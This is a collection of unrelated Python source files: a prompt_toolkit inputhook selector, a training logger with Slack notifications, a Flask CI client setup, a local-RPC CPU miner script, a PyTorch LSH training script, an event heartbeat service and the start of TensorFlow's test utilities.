def __init__(self, selector: BaseSelector, inputhook: Callable[['InputHookContext'], None]) -> None:
self.selector = selector
self.inputhook = inputhook
self._r, self._w = os.pipe()
def register(self, fileobj, events, data=None):
return self.selector.register(fileobj, events, data=data)
def unregister(self, fileobj):
return self.selector.unregister(fileobj)
def modify(self, fileobj, events, data=None):
        return self.selector.modify(fileobj, events, data=data)
def select(self, timeout=None):
# If there are tasks in the current event loop,
# don't run the input hook.
if len(get_event_loop()._ready) > 0:
return self.selector.select(timeout=timeout)
ready = False
result = None
# Run selector in other thread.
def run_selector() -> None:
nonlocal ready, result
result = self.selector.select(timeout=timeout)
os.write(self._w, b'x')
ready = True
th = threading.Thread(target=run_selector)
th.start()
def input_is_ready() -> bool:
return ready
# Call inputhook.
# The inputhook function is supposed to return when our selector
# becomes ready. The inputhook can do that by registering the fd in its
# own loop, or by checking the `input_is_ready` function regularly.
self.inputhook(InputHookContext(self._r, input_is_ready))
# Flush the read end of the pipe.
try:
# Before calling 'os.read', call select.select. This is required
# when the gevent monkey patch has been applied. 'os.read' is never
# monkey patched and won't be cooperative, so that would block all
# other select() calls otherwise.
# See: http://www.gevent.org/gevent.os.html
# Note: On Windows, this is apparently not an issue.
# However, if we would ever want to add a select call, it
# should use `windll.kernel32.WaitForMultipleObjects`,
# because `select.select` can't wait for a pipe on Windows.
if not is_windows():
select.select([self._r], [], [], None)
os.read(self._r, 1024)
except OSError:
# This happens when the window resizes and a SIGWINCH was received.
# We get 'Error: [Errno 4] Interrupted system call'
# Just ignore.
pass
# Wait for the real selector to be done.
th.join()
return result
def close(self) -> None:
"""
Clean up resources.
"""
if self._r:
os.close(self._r)
os.close(self._w)
self._r = self._w = -1
self.selector.close()
def get_map(self):
return self.selector.get_map()
class InputHookContext:
"""
Given as a parameter to the inputhook.
"""
def __init__(self, fileno: int, input_is_ready: Callable[[], bool]) -> None:
self._fileno = fileno
self.input_is_ready = input_is_ready
def fileno(self) -> int:
return self._fileno
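# Hedged usage sketch (added for illustration; not part of the original
# module). It shows the shape of an inputhook callable: do other work until
# `input_is_ready()` reports that prompt_toolkit has input to process.
def _example_inputhook(context: InputHookContext) -> None:
    import time
    while not context.input_is_ready():
        # One iteration of the "other" event loop would go here; we just idle.
        time.sleep(0.01)


def _example_install() -> AbstractEventLoop:
    # Installs an asyncio loop whose selector yields to the inputhook above
    # whenever the real selector has nothing ready yet.
    return set_eventloop_with_inputhook(_example_inputhook)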
|
infolog.py
|
import atexit
import json
from datetime import datetime
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a')
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new {} training run\n'.format(run_name))
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
def log(msg, end='\n', slack=False):
print(msg, end=end)
if _file is not None:
_file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
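# Hedged usage sketch (added for illustration; not part of the original
# module). The file name, run name and message text are placeholders.
def _example_usage():
    init('train.log', 'example_run', slack_url=None)
    log('step 100: loss=1.234')          # printed and appended to train.log
    log('finished epoch 1', slack=True)  # would also post to Slack if a URL were set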
|
__init__.py
|
"""
Copyright (c) 2015 Michael Bright and Bamboo HR LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import os
import threading
import time
try:
import simplejson as json
except ImportError:
import json
from flask import Flask
from rapid.lib import is_primary_worker, setup_logging, setup_status_route
from .parsers import load_parsers
from ..lib import setup_config_from_file
from .communicator.client_communicator import ClientCommunicator
from .controllers import register_controllers
app = Flask("rapidci_client")
app.rapid_config = {'_is': 'client'}
logger = logging.getLogger("rapid")
@app.errorhandler(500)
def internal_error(exception):
    response = app.response_class(json.dumps(exception.to_dict()))
response.status_code = exception.status_code
response.content_type = 'application/json'
return response
def setup_logger(flask_app):
setup_logging(flask_app)
def load_extensions(flask_app):
from rapid.lib.framework.ioc import IOC
from rapid.extensions.extension_loader import ExtensionLoader
extension_loader = IOC.get_class_instance(ExtensionLoader)
extension_loader.load_extensions(flask_app)
def configure_application(flask_app, args):
setup_status_route(flask_app)
setup_config_from_file(flask_app, args)
setup_logger(flask_app)
load_parsers()
register_controllers(flask_app)
if is_primary_worker() and not args.run and not args.upgrade:
setup_client_register_thread()
clean_workspace()
if args.mode_logging:
from rapid.lib.log_server import LogServer
log_server = LogServer(args.log_dir)
log_server.configure_application(flask_app)
load_extensions(flask_app)
def clean_workspace():
try:
import shutil
if os.path.isdir(app.rapid_config.workspace): # pylint: disable=no-member
shutil.rmtree(app.rapid_config.workspace) # pylint: disable=no-member
os.mkdir(app.rapid_config.workspace) # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
pass
def _registration_thread():
communicator = ClientCommunicator(app.rapid_config.master_uri, app.rapid_config.quarantine_directory, app, app.rapid_config.verify_certs) # pylint: disable=no-member
while True:
communicator.register(app.rapid_config)
time.sleep(app.rapid_config.registration_rate) # pylint: disable=no-member
def setup_client_register_thread():
logger.info("Setting up client register thread")
thread = threading.Thread(target=_registration_thread)
thread.daemon = True
thread.start()
def run_action_instance(action_instance_id):
# type: (int) -> None
from rapid.client.action_instance_runner import ActionInstanceRunner
runner = ActionInstanceRunner(app.rapid_config)
runner.run_action_instance(app, action_instance_id)
def upgrade_rapid():
from rapid.client.client_upgrader import ClientUpgrader
upgrader = ClientUpgrader(app.rapid_config)
upgrader.upgrade(app)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Girauno developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
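# The CONFIG-FILE passed on the command line is parsed in __main__ as simple
# key=value lines ('#' starts a comment). Illustrative example only:
#
#   host=127.0.0.1
#   port=4142
#   rpcuser=someuser
#   rpcpass=somepass
#   threads=2
#   hashmeter=1
#   scantime=30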
class GiraunoRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = GiraunoRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 4142
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
inference_slide.py
|
import os
import sys
import numpy as np
import argparse
from datetime import datetime
#torch related
import torch
from torch.utils.data import DataLoader
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from torchvision import datasets, transforms
import torch.multiprocessing as mp
import torch.nn.init as init
from config import config
from network import MultiLabelDataset, Net
from triplet_network import Network, TripletNet
from adam_base import Adam
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"]=config.gpu
use_cuda = torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
DATASET = ['wiki10', 'amz13k','amz630k','deli']
DATAPATH_TRAIN = {'wiki10': "/home/bc20/NN/structured_matrix/wiki10_train.txt",
'amz13k': "/home/bc20/NN/structured_matrix/amazonCat_train.txt",
'amz630k': "/home/bc20/NN/structured_matrix/amazon_shuf_train",
'deli':"/home/zl71/data/deliciousLarge_shuf_train.txt",
'wiki300': "/home/bc20/NN/data/wikiLSHTC_shuf_train.txt"}
DATAPATH_TEST = {'wiki10': "/home/bc20/NN/structured_matrix/wiki10_test.txt",
'amz13k': "/home/bc20/NN/structured_matrix/amazonCat_test.txt",
'amz630k': "/home/bc20/NN/structured_matrix/amazon_shuf_test",
'deli':"/home/zl71/data/deliciousLarge_shuf_test.txt",
'wiki300': "/home/bc20/NN/data/wikiLSHTC_shuf_test.txt"}
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', type = str, default = "deli", choices = DATASET)
parser.add_argument('--K', type = int, default = 11) #13 wiki: 5 deli:10
parser.add_argument('--L',type = int, default = 10) # wiki: 5
parser.add_argument('--rebuild_freq',type = int, default = 30)
parser.add_argument('--epoch_num', type=int, default=30)
parser.add_argument('--lr', type=float, default=0.001 )
parser.add_argument('--batch_size', type=int, default=128)
parser.add_argument('--layer_dim',type = int, default = 128)
parser.add_argument('--margin', type = float, default = 1)
parser.add_argument('--seed',type = int, default = 17)
parser.add_argument('--print_every', type = int, default = 109)
parser.add_argument('--test_every', type = int, default = 1000)
#parser.add_argument('--num_processes', type=int, default=20)
#parser.add_argument('--cuda_device',type = str, default = "1")
args = parser.parse_args()
now = datetime.now()
time = date_time = now.strftime("%m%d%H%M%S")
logfile = "./inference_slide_log/{}/K{}L{}r{}b{}at{}.txt".format( args.dataset,args.K, args.L, args.rebuild_freq, args.batch_size,time)
print("args",args,file = open(logfile, "a"))
'''
Helper Functions
'''
def get_networkDataLoader(args):
# set up dataset object
train_ds = MultiLabelDataset( DATAPATH_TRAIN[args.dataset])
test_ds = MultiLabelDataset( DATAPATH_TEST[args.dataset])
# feed dataset to create dataloader
    # num_workers != 0 -> semaphore tracker / segmentation fault issues
train_ld = DataLoader( train_ds, pin_memory = True,num_workers = 0, shuffle = False, batch_size = args.batch_size)
test_ld = DataLoader( test_ds, pin_memory = True,num_workers = 0, shuffle = False, batch_size =args.batch_size)
return train_ld, test_ld, train_ds.D, train_ds.L, train_ds.N, test_ds.N
def get_tripletDataLoader(train_data, num_iter, batch_size = 16, shuffle = True, pin_memory=False):
train_Dataset = Dataset(train_data)
train_dataloader = DataLoader(train_Dataset, batch_size=batch_size, shuffle=shuffle, num_workers=0, pin_memory=pin_memory)
return train_dataloader
def getTripletWeight(triplet_dict):
hash_weight = torch.empty(1)
for l,triplet in triplet_dict.items():
if(l == 0):
hash_weight = triplet.classifier.dense1.weight
else:
hash_weight = torch.cat( (hash_weight,triplet.classifier.dense1.weight), 0)
hash_weight = torch.t(hash_weight)
return hash_weight
def weight_init(m):
if isinstance(m, nn.Conv1d):
init.normal_(m.weight.data)
if m.bias is not None:
init.normal_(m.bias.data)
elif isinstance(m, nn.Conv2d):
init.xavier_normal_(m.weight.data)
if m.bias is not None:
init.normal_(m.bias.data)
elif isinstance(m, nn.Conv3d):
init.xavier_normal_(m.weight.data)
if m.bias is not None:
init.normal_(m.bias.data)
elif isinstance(m, nn.ConvTranspose1d):
init.normal_(m.weight.data)
if m.bias is not None:
init.normal_(m.bias.data)
elif isinstance(m, nn.ConvTranspose2d):
init.xavier_normal_(m.weight.data)
if m.bias is not None:
init.normal_(m.bias.data)
elif isinstance(m, nn.ConvTranspose3d):
init.xavier_normal_(m.weight.data)
if m.bias is not None:
init.normal_(m.bias.data)
elif isinstance(m, nn.BatchNorm1d):
init.normal_(m.weight.data, mean=1, std=0.02)
init.constant_(m.bias.data, 0)
elif isinstance(m, nn.BatchNorm2d):
init.normal_(m.weight.data, mean=1, std=0.02)
init.constant_(m.bias.data, 0)
elif isinstance(m, nn.BatchNorm3d):
init.normal_(m.weight.data, mean=1, std=0.02)
init.constant_(m.bias.data, 0)
elif isinstance(m, nn.Linear):
init.xavier_normal_(m.weight.data)
init.normal_(m.bias.data)
elif isinstance(m, nn.LSTM):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal_(param.data)
else:
init.normal_(param.data)
elif isinstance(m, nn.LSTMCell):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal_(param.data)
else:
init.normal_(param.data)
elif isinstance(m, nn.GRU):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal_(param.data)
else:
init.normal_(param.data)
elif isinstance(m, nn.GRUCell):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal_(param.data)
else:
init.normal_(param.data)
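# unpackbits() expands integer hash codes into their binary representation:
# each input value becomes a row of `num_bits` 0/1 entries, least significant
# bit first. For example, unpackbits(torch.tensor([5]), 4) -> [[1, 0, 1, 0]].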
def unpackbits(x, num_bits):
x = x.reshape(-1, 1).int()
to_and = 2 ** torch.arange(num_bits).reshape(1,num_bits).int()
return (x & to_and).bool().int()
'''
Training Related
'''
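# train_cl() updates one of the L triplet networks that learn the LSH hash
# functions. Its loss mixes three terms: a task-driven term that weights each
# hash-bit probability by the main network's per-sample loss, the triplet
# margin loss, and a load-balancing term that penalizes hash buckets that are
# far from half full. The *_weight variables below switch the terms on or off.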
def train_cl(id, triplet_data, net_loss, opt_cl1, triplet, s_hashcode, device, num_iter):
opt_cl1.zero_grad()
triplet.to(device)
x = triplet_data['arc']
p = triplet_data['pos']
n = triplet_data['neg']
x, p, n = x.to(device).float(), p.to(device).float(), n.to(device).float()
running_loss = 0.0
s_hashcode = torch.tensor(s_hashcode)
#convert hash code to binary representation
binary = unpackbits( s_hashcode, args.K ).to(device).float()
load_weight = (torch.abs(torch.sum(binary,dim =0) - args.batch_size/2) + 0.01 ) / args.batch_size
triplet_loss, emb = triplet.forward(x, p, n)
# task loss = (1-y)*log(prob) + y*log(prob)
newx = x.repeat(1, args.K).view(-1, x.size()[1])
newweight = triplet.classifier.dense1.weight.data.repeat(x.size()[0], 1)
prob = (1 - torch.acos(F.cosine_similarity(newx, newweight).view(-1, args.K))/3.141592653 ).to(device)
#print( (1 - binary) * torch.log(1 - prob + 1e-8 ) + (binary) * torch.log(prob + 1e-8) )
#print( -net_loss * ( (1 - binary) * torch.log(1 - prob + 1e-8 ) + (binary) * torch.log(prob + 1e-8) ))
taskloss = torch.mean( -net_loss * ( (1 - binary) * torch.log(1 - prob + 1e-8 ) + (binary) * torch.log(prob + 1e-8) ) )
loadloss = torch.mean(load_weight * ( (1 - binary) * torch.log(1 - prob + 1e-8 ) + (binary) * torch.log(prob + 1e-8) ) )
#combine loss
# print((1 - binary) * torch.log(1 - prob + 1e-8 ) + (binary) * torch.log(prob + 1e-8))
# print(net_loss)
# print("\ntaskloss",taskloss )
# print("triplet_loss",triplet_loss)
# print("loadloss",loadloss)
    tripletloss_weight = 0.1  # used to enable/disable the two losses
    taskloss_weight = 1  # used to enable/disable the two losses
load_weight = 0
loss = taskloss * taskloss_weight + triplet_loss * tripletloss_weight + loadloss * load_weight
# print("train_cl loss:", loss.item())
loss.backward()
opt_cl1.step()
# print statistics
running_loss += loss.item()
return running_loss, taskloss
def train_network(args, model, device, train_loader, test_loader,optimizer, epoch, triplet_dict, triplet_opt1_dict,triplet_opt2_dict):
    # evaluate once before training starts
#evaluate(args,model,device,test_loader,1,True)
model.train()
#use triplet network weight as hash table
triplet_flag = True
triplet_baseline = []
avg_triplet_baseline = 0.0
std_triplet_baseline = 1
for idx, (y, x,x_v) in enumerate(train_loader):
optimizer.zero_grad()
x = x.to(device)
logits, new_targets, nsamples, weight_pair,sid, s_hashcode, s_ip, s_r_ip= model.forward(x,x_v,y)
output_dist = F.log_softmax(logits, dim=-1)
loss = F.kl_div(output_dist, new_targets, reduction='sum') / args.batch_size
#loss = F.binary_cross_entropy_with_logits(logits, new_targets, reduction='sum') / args.batch_size
#loss = F.binary_cross_entropy_with_logits(logits.view(-1, nsamples), new_target, reduction='sum') / batch_size
loss.backward()
optimizer.step()
#reset model last extra weight, used for padding
model.weights.data[-1,:].zero_()
model.lshLayer.params.weight.data[-1,:].zero_()
#print train loss
if idx % args.print_every == args.print_every-1: # print every 100 mini-batches
print('===[%d, %5d] Train loss: %.3f, table load: %.3f' % (epoch , idx + 1, loss.item(),model.lshLayer.lsh.stats()))
print("inner product: sampe - random: ", s_r_ip)
#print evaluate accuracy
if idx % args.test_every == args.test_every -1 :
evaluate(args,model,device,test_loader,k = 1,training = True)
evaluate(args,model,device,test_loader,k = 5,training = True)
#collect data for triplet network
weight_pair['arc'] = weight_pair['arc'].detach()
weight_pair['pos'] =weight_pair['pos'].detach()
weight_pair['neg'] =weight_pair['neg'].detach()
to_triplet_loss = F.kl_div(output_dist, new_targets, reduction = 'none')
to_triplet_loss = torch.sum(to_triplet_loss, dim = 1).view(-1,1)
to_triplet_loss = ((to_triplet_loss- torch.mean(to_triplet_loss))/torch.std(to_triplet_loss)).detach()
#processes = []
print_loss = 0
for l in range(args.L):
triple_loss, baseline = train_cl(l, weight_pair, to_triplet_loss, triplet_opt1_dict[l],triplet_dict[l], s_hashcode[:,l], device, idx)
print_loss += triple_loss
# in case of parallel CPU training of the triplet networks
# p = mp.Process(target=train_cl, args=(l, weight_pair, to_triplet_loss, triplet_opt1_dict[l],triplet_dict[l], s_hashcode[:,l], device, idx))
# p.start()
# processes.append(p)
# for p in processes:
# p.join()
#whitening loss
# triplet_baseline += [loss.item()]
# avg_triplet_baseline = np.mean(np.array(triplet_baseline))
# std_triplet_baseline = np.std(np.array(triplet_baseline))
if idx % args.print_every == args.print_every-1: # print every 100 mini-batches
print('===[%d, %5d] Triplet Train loss: %.3f' % (epoch , idx + 1, print_loss / args.L))
#rebuild hash table
if(idx % args.rebuild_freq == 0 and idx!= 0 ):
#print("====[%d, %5d] Rebuild Hash table"% (epoch , idx + 1))
#if flag is true, using triplet weight to set simhash
if(triplet_flag):
model.lshLayer.hash_weight = getTripletWeight(triplet_dict)
model.lshLayer.buildLSH(True)
else:
model.lshLayer.buildLSH(False)
torch.cuda.empty_cache()
evaluate(args,model,device,test_loader,1,False)
evaluate(args,model,device,test_loader,5,False)
def evaluate(args, model, device, loader, k=1,training=False):
model.eval()
N = 0.
correct = 0.
with torch.no_grad():
for batch_idx, (labels, data, value) in enumerate(loader):
batch_size, ml = labels.size()
sizes = torch.sum(labels != -1, dim=1)
data = data.to(device)
output = model(data, value, labels).cpu()
# values, indices = torch.max(output, dim=1)
#print("predicte",indices)
# for bdx in range(batch_size):
# N += 1
# label_set = labels[bdx,:sizes[bdx]].numpy().tolist()
# if indices[bdx].item() in label_set:
# correct+=1
# #print("num of correct",correct)
# #print(N)
values, indices = torch.topk(output, k=k, dim=1)
for bdx in range(batch_size):
label_set = labels[bdx,:sizes[bdx]].numpy().tolist()
for idx in range(k):
N += 1
if indices[bdx, idx].item() in label_set:
correct+=1.
# if idx == 0:
# top1+=1.
if(batch_idx == 20 and training):
# print("predicte",indices)
break
print("{}===Test Accuracy {:.4f}, total_correct {}".format(k,correct/N, correct))
print("{}===Test Accuracy {:.4f}, total_correct {}".format(k, correct/N, correct),file = open(args.logfile, "a"))
model.train()
if __name__ == "__main__":
# args = parser.parse_args()
#set up seed
np.random.seed(args.seed)
torch.manual_seed(0)
#set up cuda
# os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
# os.environ["CUDA_VISIBLE_DEVICES"]= "0,1,5,6"
# use_cuda = torch.cuda.is_available()
# device = torch.device("cuda:1" if use_cuda else "cpu")
mp.set_start_method('spawn')
print("device",device)
#read in train and test data
print("\n===========Read in data: " + args.dataset + "===================")
train_loader, test_loader, feature_dim, num_class, num_train, num_test = get_networkDataLoader(args)
print("Dataset Statistics: feature dimension: %d, label dimension: %d, number of train data: %d, number of test data: %d"
%(feature_dim, num_class, num_train, num_test))
#y,x = next(iter(train_loader))
#print(x)
# set up triplet network
print("\n===========Set Up Triplet Network================")
triplet_dict = {}
triplet_opt1_dict = {}
triplet_opt2_dict = {}
for l in range(args.L):
classifier = Network(args.layer_dim, args.K)
triplet_dict[l] = TripletNet(classifier, args.margin)
triplet_opt1_dict[l] = optim.SGD(triplet_dict[l].parameters(), lr = args.lr, momentum = 0.9)
triplet_opt2_dict[l] = optim.SGD(triplet_dict[l].parameters(), lr = args.lr, momentum = 0.9)
#triplet_dict[l].to(device)
# print("classifier %d"%(l))
# print("network weight0 shape:", triplet_dict[l].classifier.dense1.weight.shape)
# collect weight for hash table
hash_weight = getTripletWeight(triplet_dict).cpu()
print("hash weight shape:", hash_weight.shape)
print("\n============Set Up Network==================")
model = Net(feature_dim, num_class, args.layer_dim, hash_weight, args.K, args.L).to(device)
optimizer = Adam(model.parameters(), lr=0.0001)
# optimizer = optim.SGD(model.parameters(), lr = args.lr, momentum = 0.9)
print("\n============Training start=================")
with open(args.logfile,'w') as out:
for epoch in range(args.epoch_num):
print("Epoch: ", epoch)
train_network(args, model, device, train_loader, test_loader,optimizer, epoch,triplet_dict,triplet_opt1_dict,triplet_opt2_dict)
|
heartbeat.py
|
#
# (C) Copyright 2012 Enthought, Inc., Austin, TX
# All rights reserved.
#
# This file is open source software distributed according to the terms in
# LICENSE.txt
#
import sys
import time
import threading
from .abstract_event_manager import BaseEvent
from .package_globals import get_event_manager
if sys.platform == 'win32':
accurate_time = time.clock
else:
accurate_time = time.time
class HeartbeatEvent(BaseEvent):
""" Event which is emitted periodically
"""
pass
class Heartbeat(object):
""" Service which emits an event periodically
Note that unless the event manager uses threaded dispatch, event listeners
which take longer than the interval to run will result in a slower
heartbeat. The heartbeat runs on its own thread, and as a result, any
listeners will also run on that thread.
The heartbeat is only intended to be approximately accurate, and should not
be used for applications which require precise timing.
"""
def __init__(self, interval=1 / 50., event_manager=None):
self.state = 'waiting'
self.interval = interval
self.frame_count = 0
self.event_manager = (event_manager if event_manager is not None else
get_event_manager())
def run(self):
self.state = 'running'
while self.state in ['running', 'paused']:
if self.state == 'running':
t = accurate_time()
self.event_manager.emit(
HeartbeatEvent(
source=self,
time=t,
frame=self.frame_count,
interval=self.interval))
self.frame_count += 1
# try to ensure regular heartbeat, but always sleep for at least 1ms
wait = max(t + self.interval - accurate_time(), 0.001)
else:
wait = self.interval
time.sleep(wait)
self.state = 'stopped'
def serve(self):
thread = threading.Thread(target=self.run)
thread.daemon = True
thread.start()
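# Illustrative usage sketch (not part of the original module): emit a few
# heartbeats when this file is run directly. It assumes a default event
# manager has been configured, i.e. that get_event_manager() returns an
# object whose emit() accepts HeartbeatEvent instances.
if __name__ == '__main__':
    hb = Heartbeat(interval=0.1)
    hb.serve()                 # heartbeat runs on a daemon thread
    time.sleep(1.0)            # let roughly ten HeartbeatEvents be emitted
    hb.state = 'stopped'       # the run loop exits on its next iteration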
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import config
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import tfrt_utils
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
